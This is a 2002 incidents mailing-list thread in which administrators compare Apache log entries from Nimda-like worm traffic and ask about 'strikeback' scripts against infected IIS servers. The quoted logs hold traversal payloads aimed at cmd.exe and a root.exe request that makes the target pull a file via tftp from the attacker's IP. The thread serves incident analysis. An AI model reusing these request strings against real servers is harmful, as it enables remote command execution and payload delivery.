-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ok, this has been driving me nuts. Found these line in my Apache logs lately; 4.41.54.56 - - [23/Feb/2002:08:26:20 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.54.56%20GET%20Admin.dll%20Admin. dll HTTP/1.0" 200 2701 4.41.54.56 - - [23/Feb/2002:08:26:22 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295 Seemingly pointing at a specific IP. Several times now I've seen this IP and others, as well as the usual bunk nimda lines. What the heck is it, and does it in fact point to a collection point? Also, what is the opinion of running IIS shutdown perl scripts? The so-called Strikeback Script? On the one hand, it seems it might get the attention of the owner of the hacked IIS system, on the other...some unsaved info could be lost on the IIS machine, assuming the script even works. I'm currently searching for a Notification Script, of the type mentioned elsewhere in this thread, if anyone has it on an FTP. - ----- Original Message ----- From: "Ralph Los" <RLosat_private> To: <incidentsat_private> Sent: Tuesday, February 26, 2002 6:46 AM Subject: Wave of Nimda-like hits this morning? Hey, I've had multiple clients' Solaris boxes crashing this morning from what appears to be a Nimda-like 'scripts/..%5c../root.exe', and the usual. The same old unicode characters are present [%2f, %5c] but a new one has appeared I haven't seen yet. This line: ' /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.e xe ' appears a few times and I'm not quite sure what to make of it... Please keep in mind that came from a Solaris box, Apache log. Whatever this (maybe) new bug is, it's blowing up these boxes left and right...can't figure it out. They're all relatively new 1.3'ish versions I think. Anyone else seeing anything weird? - ----------------------------------------| Ralph M. Los Sr. Security Consultant and Trainer EnterEdge Technology, L.L.C. rlosat_private (770) 955-9899 x.206 - ----------------------------------------| - ---------------------------------------------------------------------- - ------ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBPHxLFJkmeTuuwg2cEQIIIgCguagWRT3ygBo/MU8KfmSZX+BKcKgAoOEZ 9jl40lkEIIE90s1XNVBy0LSR =5Dgf -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 14:10:35 PST